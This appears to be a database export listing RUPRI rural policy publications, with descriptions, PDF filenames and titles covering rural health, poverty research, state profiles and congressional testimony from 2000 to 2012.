| NULL | Presentation to the Mississippi Entrepreneurial Alliance Conference, Oxford, MS, by Brian Dabson, RUPRI Executive Vice President.<BR>May 2006 | dabson050406.pdf | 92 | Competitiveness, Entrpreneurship and Governance in Rural America |
| Rural Health Panel Documents | A Joint Policy Paper of the Maine Rural Health Research Center and the RUPRI Rural Health Panel<BR>August 2000 | p2000-14.pdf | 112 | Designing a Prescription Drug Benefit for Rural Medicare Beneficiaries: Principles, Criteria, and Assessment |
| NULL | Media advisory of a briefing and study released on April 7, 2011 by RUPRI | Transportation_PressRelease.pdf | 366 | Transportation Options Crucial to Rural and Small Town Economic Development and Quality of Life |
| NULL | <SPAN style="FONT-FAMILY: 'Verdana', 'sans-serif'; FONT-SIZE: 12pt; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-bidi-font-family: Calibri; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA">The RUPRI Rural health panel has written a description of a future rural system that would be built on foundations of affordability, accessibility, community focus, high quality, and patient centeredness, The paper develops the Panel\92s vision of rural health care that is affordable and accessible for rural residents through a sustainable health system that delivers high quality, high value services.</SPAN> | HealthPanel_FutureSystem_October2011.pdf | 378 | The High Performance Rural Health Care System of the Future |
| Other | Craig Thomas R-Hope Act | Craig Thomas R-HoPE Act.pdf | 142 | Craig Thomas R-Hope Act |
| NULL | <UL>
<LI>Employer-Provided Training in Low-Wage Jobs</LI>
<LI>2004-2005 RUPRI RPRC Dissertation Fellowship Awardees</LI>
<LI>The Impact of the 1990s Economic Boom on LEss-Educated Workers in Rural and Urban America</LI>
<LI>2003-2004 RUPRI RPRC Postdoctoral Fellowship Awardees</LI>
<LI>The Work-Welfare Calculation in Rural and Urban Households</LI>
<LI>Solving Food Insecurity in Rural Iowa</LI></UL> | Perspectivesvol2n2.pdf | 198 | Volume 2, Number 2: Summer 2004 |
| NULL | One page summary from the RUPRI Rural Health Panel<BR>October 30, 2009 | Health_ReformSummary_Oct09.pdf | 302 | Assuring Health Coverage for Rural People Through Health Reform: Summary |
| State Profiles | Louisiana Demographic and Economic Profile, updated July 2006 | Louisiana.pdf | 42 | Louisiana |
| NULL | Narrative Table: Commentary from the RUPRI Rural Health Panel regarding "Transforming the Health Care Delivery System: Proposals to Improve Patient Care and Reduce Health Care Costs" from the Senate Finance Committee (April 2009)<BR>May 26, 2009 | HealthPanel_FinanceMay09_table.pdf | 285 | Narrative Table: A Rural Perspective/Commentary Regarding Transforming the Health Care Delivery System |
| NULL | Charles W. Fluharty, RUPRI Director<BR>Written Statement for the Record<BR>Testimony before the Subcommittee on Economic Development, Public Buildings and Emergency Management<BR>U.S. House of Representatives<BR>March 17, 2005 | Testimony031705Final.pdf | 123 | Testimony before the Subcommittee on Economic Development, Public Buildings and Emergency Management |
| NULL | Written Statement for the Record by RUPRI President Chuck Fluharty before the House Agriculture Committee Subcommittee on Rural Development, Research, Biotechnology, and Foreign Agriculture: Public Hearing to review the various definitions of rural applied under programs operated by the U.S. Department of Agriculture.<BR>February 15, 2011 | Fluharty_HouseAg_Feb2011.pdf | 349 | House Agriculture Committee Testimony Regarding Rural Definitions |
| Rural Health Panel Documents | RUPRI Rural Health Panel Issue Brief #2<BR>Andrew F. Coburn, A. Clinton MacKinney, Timothy D. McBride, Keith J. Mueller, Rebecca T. Slifkin, and Mary K. Wakefield<BR>March 2007 | RuralDefinitionsBrief.pdf | 99 | Choosing Rural Definitions: Implications for Health Policy |
| NULL | Updated state profile for North Carolina<BR>November 11, 2008 | NorthCarolina2.pdf | 226 | North Carolina State Profile Update |
| NULL | RUPRI Farm Bill Policy Brief #3<BR>Thomas G. Johnson, Dennis Robinson, and Kathleen Miller<BR>October 15, 2007 | PolicyBrief_Johnson.pdf | 145 | Economic Impacts of Direct Farm Payments and Business and Industry Loan Guarantees |
| NULL | <UL>
<LI>Rural Poverty in the Northeast: Global Forces and Individual Coping Strategies</LI>
<LI>Obstacles to Employment among Poor Rural Women</LI>
<LI>The Push and Pulls behind Residential Mobility of Low-Income Families in Upstate New York</LI>
<LI>Work, Welfare, and the Informal Economy in the Rural Northeast</LI></UL> | Perspectivesvol3n2.pdf | 203 | Volume 3, Number 2: Summer 2005 |
| State Profiles | Delaware Demographic and Economic Profile, updated December 2006 | Delaware.pdf | 32 | Delaware |
| Rural Health Panel Documents | Policy Report from the RUPRI Rural Health Panel<BR>Guest Author Anthony Wellever<BR>August 2000 | p2000-12.pdf | 109 | Area Wage Index of the Medicare Inpatient Hospital Prospective Payment System: Perspecitves, Policies, and Choices |
| NULL | Updated State Profile for South Carolina<BR>February 3, 2009 | SouthCarolina2.pdf | 253 | South Carolina State Profile Update |
| NULL | Presentation to the National Association of Regional Councils 40th Annual Conference: <EM>Regional Readiness Responding to Change</EM>, by Brian Dabson, RUPRI Executive Vice President.<BR>June 2006 | Dabson062006.pdf | 86 | Getting to There from Here: Rural and Regional Developmment |
| NULL | Data brief by RUPRI Program Director Kathy Miller<BR>May 2010 | The ACS and County Data.pdf | 322 | The American Community Survey: What it Means for County Data |
| NULL | The Rural Impacts of the Administration FY08 Budget Proposal<BR>From the National Rural Network<BR>March 2007 | NRNBudget3.pdf | 104 | Why Rural Matters III |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-09, August 2004<BR>Monica Fisher | WP0409.pdf | 174 | On the Empirical Finding of a Higher Risk of Poverty in Rural Areas: Is Rural Residence Endogenous to Poverty? |
| State Profiles | Pennsylvania Demographic and Economic Profile, updated June 2006 | Pennsylvania.pdf | 62 | Pennsylvania |
| NULL | Written statement for the record.<BR>Dr. Randy Smith, President of the Rural Community College Alliance<BR>Testimony before the U.S. House of Representatives<BR>Committe on Agriculture<BR>Subcommittee on Rural Development, Biotechnology, Specialty Crops, and Foreign Agriculture<BR>March 31, 2009 | RCCA_Testimony_March2009.pdf | 273 | RCCA Testimony in House RD Hearing March 31, 2009 |
| State Profiles | Ohio Demographic and Economic Profile, updated June 2006 | Ohio.pdf | 59 | Ohio |
| NULL | Updated state profile for California<BR>January 12, 2009 | California2.pdf | 233 | California State Profile Update |
| NULL | Presentation by RUPRI President Brian Dabson to the Association for Enterprise Opportunity 1st Annual Rural Summit.<BR>Anaheim, CA, May 20, 2008 | Dabson_AEO_May08.pdf | 157 | Rural Policy - The Long View and What You Can Do About It |
| NULL | Full Report: Commentary from the RUPRI Health Panel regarding "Financing Comprehensive Health Care Reform: Proposed Health System Savings and Revenue Options" from the Senate Finance Committee (May 2009).<BR>June 15, 2009 | HealthPanel_FinanceJune09_2_Final.pdf | 293 | A Rural Perspective/Commentary regarding Financing Health Care Reform from the Senate Finance Committee |
| NULL | RUPRI Rural Poverty Research Center Working Paper #08-01, June 2008<BR>Scott W. Allard and Jessica Cigna | WP08-01.pdf | 192 | Access to Social Services in Rural America: The Geography of the Safety Net in the Rural West |
| NULL | Writtent statement for the record by Charles W. Fluharty - testimony before the Senate Ag Committee regarding the Rural Development Title of the new Farm Bill.<BR>February 13, 2007 | testimony021307.pdf | 75 | Senate Ag Committee Testimony |
| NULL | Updated State Profile for Utah<BR>January 26, 2009 | Utah2.pdf | 242 | Utah State Profile Update |
| NULL | Updated State Profile for Maine<BR>October 10, 2008 | Maine2.pdf | 213 | Maine State Profile Update |
| NULL | Updated state profile for New Jersey<BR>February 13, 2009 | NewJersey2.pdf | 263 | New Jersey State Profile Update |
| NULL | <UL>
<LI>The Dfining Characteristics of Regional Poverty</LI>
<LI>2004-2005 RUPRI RPRC Undergraduate Leadership Program in Rural Poverty Research and Policy</LI>
<LI>Families Facing Material Hardship by Region and Urban-Rural Locales</LI>
<LI>The Changing Face of the Rural Poor</LI>
<LI>A Community-Based Research Framework</LI></UL> | Perspectives_Fall 04.pdf | 199 | Volume 2, Number 3: Fall 2004 |
| NULL | Presentation by RUPRI Vice President for Policy Programs Charles W. Fluharty to the OECD 7th Annual Rural Development Conference, Quebec, Canada<BR>October 25, 2009 | OECD_Fluharty_October09.pdf | 299 | The Ultimate Reality Test: The New Rural Paradigm and the Global Recession |
| NULL | Updated State Profile for Hawaii<BR>February 3, 2009 | Hawaii2.pdf | 250 | Hawaii State Profile Update |
| Rural Health Panel Documents | New Policy Brief from the RUPRI Rural Health Panel funded through a cooperative agreement with USDA Rural Development.<BR>March 2008 | Implementing_USDAProgram_030308.pdf | 152 | Implementing a new USDA Rural Development Program Targeting Small Rural Hospitals and their Communities |
| NULL | Draft briefing paper by RUPRI Research Assistant Jennifer Keller Jensen<BR>August 2009 | Climate_Change_Brief.pdf | 298 | Climate Change and Rural Communities in the U.S. |
| NULL | <UL>
<LI>The Effect of Job Growth, Social Capital, and Surrounding Conditions on Neighborhood Poverty</LI>
<LI>The Effects of Welfare Reform on Employment and Poverty in Rural and Urban Counties</LI>
<LI>Revisiting the Rural Disadvantage in Poverty</LI>
<LI>Innovative Programs for Rural TANF Clients</LI></UL> | Perspectivesvol2n4.pdf | 200 | Volume 2, Number 4: Winter 2005 |
| NULL | Presented by RUPRI President Charles W. Fluharty to the Iowa State USDA Rural Development Meeting<BR>Des Moines, Iowa<BR>April 3, 2007 | Iowa040207.ppt | 130 | Leading the Rural Renaissance: Accepting the R.D. Challenge! |
| NULL | Speech to the International Seminar on Rural Development and the Agroalimentary Sector: Future Strategies<BR>Charles W. Fluharty, RUPRI Director<BR>March 25, 2006<BR>Queretaro, Mexico | Mexico_Speech_032506.pdf | 120 | Current U.S. Rural Policy Framework: Toward a Regional Rural Innovation Strategy |
| NULL | Updated state profile for Oregon<BR>October 24, 2008 | Oregon2.pdf | 220 | Oregon State Profile Update |
| NULL | Summary of recommendations from the RUPRI Health Panel in response to <EM>CMS Report to Congress: Plan to Implement a Medicare Hospital Value-Based Purchasing Program</EM><BR>October 2008 | VBP_Highlights.pdf | 215 | Summary of RUPRI Rural Health Panel Value Based Purchasing Recommendations |
| NULL | Presented by RUPRI President Chuck Fluharty to the ESCOP Social Sciences Subcommittee, Washington DC<BR>February 11, 2011 | Fluharty_ESCOP_Feb2011.pdf | 354 | RUPRI Initiatives, Programs, and 2011 Priorities |
| NULL | Updated state profile for Alabama<BR>February 13, 2009 | Alabama2.pdf | 260 | Alabama State Profile Update |
| State Profiles | Idaho Demographic and Economic Profile, updated June 2006 | Idaho.pdf | 36 | Idaho |
| NULL | Synthesis of the RUPRI Rural Poverty Research Conference: <EM>Place Matters: Addressing Rural Poverty<BR></EM>April 2004 | synthesis.pdf | 208 | Conference Synthesis: Place Matters: Addressing Rural Poverty |
| NULL | RUPRI Rural Poverty Research Center Working Paper #03-01, July 2003<BR>Kathy Miller and Bruce Weber | WP0301.pdf | 165 | Persistent Poverty Across the Rural-Urban Continuum |
| NULL | Comments from the RUPRI Rural Health Panel regarding CMS-2328-P Proposed Rule: Medicaid Program, methods for Assuring Access to Covered Medicaid Services.<BR>July 5, 2011 | HealthPanel_CMSComments_July2011.pdf | 375 | Comments to the Centers for Medicare and Medicaid Services, July 2011 |
| NULL | Prepared by Bobby Gierisch, Director of RUPRI State Policy Programs for the Fourth Annual Agriculture Chairs Summit.<BR>January 2006 | How States Fund Initiatives.pdf | 97 | State Rural Initiatives - Where the Money Comes From |
| NULL | A RUPRI Policy Brief by Brian Dabson and Jennifer Keller<BR>December 10, 2008 | RuralBroadbandFinal.pdf | 228 | Rural Broadband |
| NULL | <UL>
<LI>How Poverty and Policy are Shaped by Place</LI>
<LI>What we Know about the Causes of Rural Poverty</LI>
<LI>Drawing Lessons from Urban Poverty Research</LI>
<LI>Influencing Policy</LI></UL> | Perspectivesvol2n1.pdf | 197 | Volume 2, Number 1: Spring 2004 |
| NULL | <UL>
<LI>Bridging Research, Policy, and Practice: The Western Rural Poverty Conference</LI>
<LI>Poverty in the Rural West</LI>
<LI>Responding to the Complex Causes of Poverty in the Northwest</LI>
<LI>Welfare-to-Work Strategies in Rural Areas</LI></UL> | Perspectivesvol3n1.pdf | 201 | Volumbe 3, Number 1: Spring 2005 |
| NULL | Case study from the RUPRI Rural Futures Lab<BR>September, 2010. | Lab_Ogallala_Sept2010.pdf | 332 | Case Study: Ogallala Commons |
| NULL | <FONT style="BACKGROUND-COLOR: #e8e8e8">
<LI><FONT style="BACKGROUND-COLOR: #ffffff">Still Left Behind, but Gaining Ground: Rural Poverty in America</FONT></LI>
<LI><FONT style="BACKGROUND-COLOR: #ffffff">Persistent Poverty in Rural America</FONT></LI>
<LI><FONT style="BACKGROUND-COLOR: #ffffff">Measuring Rurality</FONT></LI>
<LI><FONT style="BACKGROUND-COLOR: #ffffff">Employment Obstacles in Rural America</FONT><BR></LI></UL></FONT> | Perspectivesvol1n1.pdf | 193 | Volume 1, Number 1: May 2003 |
| NULL | A RUPRI Rural Economic Update from the RUPRI Center for Regional Competitiveness, March 27, 2009. | CRC_Recession.pdf | 276 | Rural America in Deep Downturn |
| State Profiles | Alaska Demographic and Economic Profile, updated August 2006 | Alaska.pdf | 25 | Alaska |
| State Profiles | Iowa Demographic and Economic Profile, updated May 2006 | Iowa.pdf | 39 | Iowa |
| NULL | RUPRI Rural Poverty Research Center Working Paper #06-03, February 2006<BR>Katherin A. MacTavish | WP06-03.pdf | 185 | We're Like the Wrong Side of the Tracks: Upscale Suburban Development, Social Inequality, and Rural Mobile Home Park Residence |
| NULL | Updated State Profile for Washington<BR>January 26, 2009 | Washington2.pdf | 243 | Washington State Profile Update |
| NULL | Presentation to the RED Group Conference, Minneapolis, MN, by Brian Dabson, RUPRI Executive Vice President.<BR>April 2006 | dabson042006.pdf | 93 | Entrepreneurship and Wealth Creation in Greater Minnesota |
| NULL | Will Rural Providers Be Left Behind?<BR>Presentation by Keith Mueller to the National Advisory Committee on Rural Health and Human Services<BR>September 15, 2010 | Mueller_NAC_Sept2010.pdf | 330 | The Brave New World of Health Systems Organization and Payment |
| NULL | RUPRI Rural Poverty Research Center Working Paper #07-02, August 2007<BR>Alex Marre and Bruce Weber | WP07-02.pdf | 191 | Assessing Community Capacity in Rural America: Some Lessons from Two Rural Observatories |
| State Profiles | Massachusetts Demographic and Economic Profile, updated June 2006 | Massachusetts.pdf | 45 | Massachusetts |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-07, June 2005<BR>Martha L. Crowley, Daniel T. Lichter, and Zhenchao Qian | WP0507.pdf | 181 | Beyond Gateway Cities: Economic Restructuring and Poverty Among Mexican Immigrant Families and Children |
| NULL | First foundation paper for the RUPRI Rural Futures Lab, November 2010 | RUPRI_Rural-Futures-Lab_2010_Food_Systems_for_Rural_Futures.pdf | 344 | Local and Regional Food Systems for Rural Futures |
| NULL | Rural Communities, Rural Regions, and the Rural-Urban Continuum.&nbsp; Presented by Chuck Fluharty to the Montana Economic Developers Association, Billings, MT.<BR>October 26, 2010 | Fluharty_BillingsMT_Oct2010.pdf | 342 | Re-Calibrating a Place-Primacy in Public Policy |
| NULL | Keynote address by RUPRI Vice President Brian Dabson at the Northeast Rural Summit, Burlington, VT
April 12, 2010 | Dabson_NortheastRuralSummit_April2010.pdf | 314 | Generating Rural Innovation and Regional Partnership |
| NULL | Designating Health Professional Shortage Areas and Medically Underserved Populations / Medically Underserved Areas<BR>By the RUPRI Rural Health Panel<BR>August 11, 2010. | Health_NPRM_Issues_August2010.FINAL.pdf | 327 | A Primer on Basic Issues to Resolve |
| NULL | <UL>
<LI>Rural Residence: Cause or Effect of Poverty?</LI>
<LI>States' Role in Alleviating Rural Poverty</LI>
<LI>Rural Community Transformation: A Social Justice Approach</LI></UL> | Perspectivesvol4n2.pdf | 206 | Volume 4, Number 2: June 2007 |
| NULL | Joint Policy Paper from the RUPRI Health and Human Services Panels<BR>March 2011 | HHSPanels_Integration_March2011.pdf | 362 | Place-based Policies and Public Health: The Road to Healthy Rural People and Places |
| State Profiles | Mississippi Demographic and Economic Profile, updated May 2006 | Mississippi.pdf | 48 | Mississippi |
| NULL | Presentation by Keith Mueller at a pre-conference of the National Rural Health Association Annual Meeting, Savannah, GA, May 18, 2010 | Mueller_NRHA_PreConf_May2010.pdf | 323 | What is Next: Prognosis for Rural Health During Implementation of Health Reform |
| NULL | Per capita income in nonmetropolitan counties relative to the U.S. per capita income in 2007. <BR>May 13, 2009<BR> | PCI07.pdf | 279 | Map: Per Capita Income in Nonmetropolitan Counties, 2007 |
| NULL | Data Brief by RUPRI Program Director Kathleen Miller<BR>February, 2009 | RUPRIBrief21309.pdf | 266 | The Importance of a Healthy Rural Economy |
| NULL | Keynote address by Charles Fluharty to the "Called to Serve Conference on Domestic Povert" The Episcopal Church<BR>Newark, NJ, April 29, 2010 | Fluharty_Newark_April10.pdf | 317 | Poverty, Place and Public Policy: Re-thinking the Rural/Urban Dialectic |
| State Profiles | Oklahoma Demographic and Economic Profile, updated October 2006 | Oklahoma.pdf | 60 | Oklahoma |
| NULL | Rural Implications of the Obama Administration Sustainable Communities Partnership.&nbsp; Presented by Charles Fluharty to the American Association of State Highway and Transportation Officials (AASHTO)&nbsp;Washington Briefing.<BR>March 2, 2010 | Fluharty_AASHTO_Mar2010.pdf | 310 | Reframining the Narrative and Policy Implications for a US Place-Based Policy |
| NULL | Overview of rural definitions and their implications, by Kathleen Miller, RUPRI Program Director.<BR>March 2009 | RuralDefinitions.pdf | 270 | Rural Definitions |
| NULL | Comments responding to Request for Information Regarding Accountable Care Organizations and the Medicare Shared Saving Program, by the RUPRI Rural Health Panel<BR>December 2010 | HealthPanel_CMSComments_Dec2010.pdf | 347 | Comments Regarding Accountable Care Organizations and the Medicare Shared Saving Program |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-04, August 2004<BR>Mindy S. Crandall and Bruce A. Weber | WP0404.pdf | 169 | Local Social and Economic Conditions, Spatial Concentrations of Poverty, and Poverty Dynamics |
| NULL | Updated state profile for Delaware<BR>February 9, 2009 | Delaware2.pdf | 259 | Delaware State Profile Update |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-02, March 2004<BR>Rebecca M. Blank | WP0402.pdf | 167 | Poverty, Policy and Place: How Poverty and Policies to Alleviate Poverty Are Shaped by Local Characteristics |
| NULL | Bobby Gierisch, RUPRI Director for State Policy Programs<BR>July 2006 | MN Rural Program Model.pdf | 95 | The Minnesota Model for Rural Development |
| NULL | Presented by Dr. Keith Mueller to the Iowa Rural Hospital Flexibility Program Meeting, Des Moines, IA<BR>April 27, 2011 | Mueller_Iowa_April2011.pdf | 372 | Winds of Change Affecting Rural Providers and Communities, Part II |
| NULL | <UL>
<LI>Rural Families Choose Home-Based Child Care</LI>
<LI>Leaving and Losing Jobs: The Plight of Rural Low-Income Mothers</LI>
<LI>Coping with Poverty: Economic Survival and Moral Capital in America</LI></UL> | Perspectivesvol4n1.pdf | 205 | Volume 4, Number 1: January 2007 |
| NULL | Can Rural Initiatives and Farm Programs Be Aligned?&nbsp; Presentation to the Agriculture and Rural Development Committee, 2006 NCSL Annual Meeting, Nashville, TN, by Charles W. Fluharty, RUPRI Director<BR>August 2006
<P></P> | nashvillencsl081506.pdf | 82 | An Opportunity in the New Farm Bill |
| Telecommunications | Report by Stephen D. McDowell and Shree Venkatachalam<BR>RUPRI Rural Telecommunications Panel<BR>January 2003 | mcdowell_jan23_2003.pdf | 121 | Defining the Challenge of Broadband Deployment in Rural Areas |
| NULL | Narrative Table: Commentary from the RUPRI Health Panel regarding "Financing Comprehensive Health Care Reform: Proposed Health System Savings and Revenue Options" from the Senate Finance Committee (May 2009).<BR>June 15, 2009 | HealthPanel_FinanceJune09_2_Table.pdf | 295 | Narrative Table: A Rural Perspective/Commentary regarding Financing Health Care Reform |
| State Profiles | Nevada Demographic and Economic Profile, updated May 2006 | Nevada.pdf | 52 | Nevada |
| State Profiles | Illinois Demographic and Economic Profile, updated September 2006 | Illinois.pdf | 37 | Illinois |
| NULL | <UL>
<LI>Tribal TANF: A Case Study of the Klamath Tribes of Oregon</LI>
<LI>Welfare Policy on American Indian Reservations: Two Approaches, Two Outcomes among the Lakota of South Dakota</LI>
<LI>Economic Conditions Improve but Hardship Still Prevalent among the Navajo, Apache, and Pima Maricopa American Indians in Arizona</LI>
<LI>Lessons Learned from Implementing Tribal TANF Programs</LI>
<LI>Core-Based Statistical Areas: A New Approach to Organizing Data Across the Urban-Rural Continuum</LI>
<LI>2003-2004 RPRC Undergraduate Leadership Program Awards</LI></UL> | Perspectivesvol1n4.pdf | 196 | Volume 1, Number 4: Winder 2004 |
| NULL | Updated State Profile for Indiana<BR>October 10, 2008 | Indiana2.pdf | 211 | Indiana State Profile Update |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-01, March 2004<BR>Monica G. Fisher and Bruce A. Weber | WP0401.pdf | 166 | Does Economic Vulnerability Depend on Place of Residence? Asset Poverty Across the Rural-Urban Continuum |
| NULL | Keynote address by Charles Fluharty to the Thumb Education and Community Day XIX<BR>Detroit, MI, April 23, 2010 | Fluharty_Michigan_April10.pdf | 316 | Driving the Great Rural Renaissance: Regional Rural Innovation |
| NULL | CMS Value Based Purchasing Program and Critical Access Hospitals, Summary Recommendations.&nbsp; From the RUPRI Rural Health Panel.<BR>January 2009 | CAH_VBP_Summary.pdf | 247 | CMS Value Based Purchasing Program and Critical Access Hospitals - Summary |
| NULL | Presented by Charles W. Fluharty, RUPRI President Emeritus<BR>Central Michigan University<BR>October 25, 2007 | Michigan.pdf | 146 | Reframing the Relationship Between Rural and Ag Policy: A Farm Bill Update |
| NULL | A Global and National Perspective on Rural Policy and Practice.<BR>Charles Fluharty, RUPRI President Emeritus<BR>Presented to the 6<SUP>th</SUP> Annual North Country Symposium.<BR>St. Lawrence University, Canton, NY, April 9, 2008 | Fluharty_NY_April08.pdf | 153 | Where Does the North Country Symposium Go From Here? |
| Poverty and Welfare Reform | Policy Brief from the RUPRI Rural Welfare Reform Research Panel<BR>February 2, 2001 | p2001-5.pdf | 138 | Welfare Reform in Rural America: A Review of Current Research |
| NULL | Presentation by Keith Mueller for National Organization of State Offices of Rural Health Webinar Series on Payment Reform and Care Coordination
September 23, 2010 | Mueller_NOSORH_Sept2010.pdf | 334 | Top Ten Takeaways from the Affordable Care Act |
| NULL | Keynote address by Tom Johnson to the Canadian Rural Revitalization Foundation Annual Conference, <EM>On the Bright Side: Rural Canada Works.</EM><BR>October 15, 2010 | Johnson_Manitoba_Oct2010.pdf | 338 | Best Practices in Local and Regional Economic Development |
| NULL | Presentation by RUPRI Vice President and COO Brian Dabson at the Texas Rural Challenge Conference, San Marcos, TX May 25, 2010 | Dabson_TexasRuralChallenge_May2010.pdf | 320 | Entrepreneurship: The Future of Texas Rural Communities |
| NULL | Updated State Profile for Tennessee<BR>February 3, 2009 | Tennessee2.pdf | 251 | Tennessee State Profile Update |
| NULL | Updated state profile for Nevada<BR>October 24, 2008 | Nevada2.pdf | 219 | Nevada State Profile Update |
| NULL | CMS-9989-P, Proposed Rule: Patient Protection and Affordable Care Act; Establishment of Exchanges and Qualified Health Plans.&nbsp; Comment letter from the RUPRI Rural Health Panel<BR>October 31, 2011 | HealthPanel_CMSComments_October2011.pdf | 379 | Comments Regarding CMS-9989-P Proposed Rule |
| NULL | Executive Summary: Commentary from the RUPRI Rural Health Panel regarding "Expanding Health Care Coverage: Proposals to Provide Affordable Coverage to All Americans" from the Senate Finance Committee (May 2009)<BR>June 9, 2009 | HealthPanel_FinanceJune09_ExecSum.pdf | 289 | Executive Summary: A Rural Perspective/Commentary Regarding Expanding Health Care Coverage |
| NULL | Presented by RUPRI Program Director Kathleen Miller at the Welfare Peer Technical Assistance Network Workshop:<BR><EM>Effective Service Delivery for TANF Clients in Rural Areas<BR></EM>Salt Lake City, UT<BR>May 23, 2007 | Miller-RUPRI.pdf | 140 | Challenges Facing Rural Areas |
| State Profiles | Kansas Demographic and Economic Profile, updated July 2006 | Kansas.pdf | 40 | Kansas |
| NULL | Demographic and Economic Profile of the Nonmetro U.S.<BR>Prepared for the Ag Chairs Summit<BR>January 2009 | Nonmetro2.pdf | 265 | Demographic Profile - Nonmetro U.S. |
| NULL | Presentation by RUPRI President Brian Dabson to the Australian Regional Economies Conference<BR>Terrigal, NSW, May 11-13, 2008 | Dabson_Australia_May08.pdf | 158 | Entrepreneurs, Entrepreneurship and Regional Development |
| NULL | First Policy Brief of the RUPRI Rural Human Services Panel<BR>February 2010 | ServiceIntegration_Feb2010.pdf | 309 | Rethinking Rural Human Service Delivery in Challenging Times: The Case for Service Integration |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-08, December 2005<BR>Alan Berube | WP0508.pdf | 182 | The Tax Code as Social Policy in Rural America |
| NULL | <FONT face=Calibri><SPAN style="FONT-FAMILY: 'Calibri', 'sans-serif'; FONT-SIZE: 11pt; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA"><STRONG>Marcie McLaughlin Accepts New Rural Leadership Role</STRONG></SPAN><SPAN style="FONT-FAMILY: 'Calibri', 'sans-serif'; FONT-SIZE: 11pt; mso-ascii-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin; mso-bidi-font-family: 'Times New Roman'; mso-bidi-theme-font: minor-bidi; mso-ansi-language: EN-US; mso-fareast-language: EN-US; mso-bidi-language: AR-SA">, <I>leaving RUPRI after six years of service to become CEO of the Midwest Assistance Program</I></SPAN></FONT> | Press_Release_McLaughlin_May2010.pdf | 318 | Marcie McLaughlin Accepts New Rural Leadership Role |
| NULL | Internal Working Paper<BR>Kathleen Miller, RUPRI Program Director<BR>August 2006 | WP2.pdf | 101 | Urban/Rural Areas and CBSAs |
| NULL | The RUPRI Rural Health Panel, as part of their ongoing efforts to highlight the rural considerations in health care reform, held a briefing with the Senate Rural Health Caucus on Thursday, April 30.&nbsp; The Panel laid out considerations for:
<LI>Access to Affordable Insurance </LI>
<LI>System Capacity</LI>
<LI>High-Value Health Care System</LI>
<LI>Health Status Disparities</LI>
<LI>System Quality </LI></UL>
<P>&nbsp;</P> | Health Care Reform 2009 Rural Considerations.pdf | 277 | Health Care Reform 2009: Rural Considerations |
| NULL | Presenation to the ECOP Leadership Advisory Council by Brian Dabson, RUPRI Executive Vice President.<BR>May 2006 | dabson052206.pdf | 89 | No Hiding Place |
| NULL | Presentation to the <EM>Enterprise Development Works!</EM> Policy Forum, Augusta, Maine, by Brian Dabson, RUPRI Executive Vice President.<BR>June 2006 | dabson060106.pdf | 88 | Why Entrepreneurship? A Vision and Policy Pointers for Maine |
| NULL | Briefing Paper by Nancy Stark, Director of the RUPRI Rural Governance Initiative<BR>June 2005 | RGI_in_pdf.pdf | 122 | Effective Rural Governance: What is it: Does it Matter |
| NULL | Oral comments presented by Charles W. Fluharty, RUPRI President and CEO, before the U.S. Senate Committee on Agriculture, Nutrition, and Forestry<BR>February 15, 2012 | Fluharty_OralComments_Feb152012.pdf | 382 | Charles Fluharty, Oral Comments, Testimony before the Senate Ag Committe, Feb 15, 2012 |
| NULL | RUPRI Rural Poverty Research Center Working Paper #04-07, August 2004<BR>Jessica S. Ziembroski and Erica L. Hauck | WP0407.pdf | 172 | The Cumulative Effect of Rural and Regional Residence Upon the Health of Older Adults |
| NULL | Presented by Keith Mueller to the 2011 Combined ORHP Annual Grantee Meeting, Bethesda, MD.&nbsp; <BR>June 27, 2011 | Mueller_ORHP_June2011.pdf | 374 | Navigation Health Insurance Exchanges and Tapping into the Temporary High Risk Pool Program |
| NULL | <UL>
<LI>Cost-Of-Living Diverences and Poverty Thresholds</LI>
<LI>Adjusting Poverty Thresholds for Cost of Living Differences</LI>
<LI>Estimating Metro-Nonmetro Cost of Living Differentials Using Food Insecurity as a Measure</LI>
<LI>Is the Cost of Living Lower in Rural Pennsylvania?</LI></UL> | Perspectivesvol1n3.pdf | 195 | Volume 1, Number 3: Fall 2003 |
| NULL | Updated state profile for Nebraska<BR>October 24, 2008 | Nebraska2.pdf | 218 | Nebraska State Profile Update |
| NULL | Updated state profile for Wyoming<BR>February 9, 2009 | Wyoming2.pdf | 255 | Wyoming State Profile Update |
| State Profiles | Texas Demographic and Economic Profile, updated April 2006 | Texas.pdf | 67 | Texas |
| NULL | Executive Summary: Commentary from the RUPRI Rural Health Panel regarding "Transforming the Health Care Delivery System: Proposals to Improve Patient Care and Reduce Health Care Costs" from the Senate Finance Committee (April 2009)<BR>May 26, 2009 | HealthPanel_FinanceMay09_ExecSum.pdf | 284 | Executive Summary: A Rural Perspective/Commentary Regarding Transforming the Health Care Delivery System |
| Rural Health Panel Documents | Policy Brief from the RUPRI Rural Health Panel<BR>Guest Author Anthony Wellever<BR>June 2000 | pb2000-5.pdf | 110 | Calculating and Using the Area Wage Index of the Medicare Inpatient Hospital Prospective Payment System |
| NULL | Presented by RUPRI President and CEO Chuck Fluharty to the National Association of Counties (NACO) 2011 Legislative Conference.<BR>March 8, 2011 | Fluharty_NACO_March2011.pdf | 357 | Rural Development, Regional Innovation, and the New Farm Bill: The New Realities |
| NULL | Full Report: Commentary from the RUPRI Rural Health Panel regarding "Transforming the Health Care Delivery System: Proposals to Improve Patient Care and Reduce Health Care Costs" from the Senate Finance Committee (April 2009)<BR>May 26, 2009 | HealthPanel_FinanceMay09_Final.pdf | 283 | A Rural Perspective/Commentary Regarding Transforming the Health Care Delivery System from the Senate Finance Committee |
| State Profiles | Georgia Demographic and Economic Profile, updated July 2006 | Georgia.pdf | 34 | Georgia |
